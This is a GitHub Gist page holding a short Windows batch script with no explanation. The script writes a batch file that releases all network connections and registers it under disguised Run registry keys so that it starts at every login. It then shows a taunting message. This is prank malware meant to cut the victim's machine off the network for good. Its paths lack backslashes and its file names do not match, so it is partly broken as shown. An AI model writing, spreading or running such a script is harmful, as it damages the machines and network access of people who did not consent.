Created
June 19, 2022 04:40
-
-
Save SleepTheGod/b66fce863ecd476105d1cb6adc3c175d to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
echo @echo off>c:windowswimn32.bat | |
echo break off>>c:windowswimn32.bat | |
echo ipconfig/release_all>>c:windowswimn32.bat | |
echo end>>c:windowswimn32.bat | |
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowsswimn32.bat /f | |
reg add hkey_current_usersoftwaremicrosfotwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn.bat /f | |
echo You have maxed your usage for a lifetime ?? | |
PAUSE |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment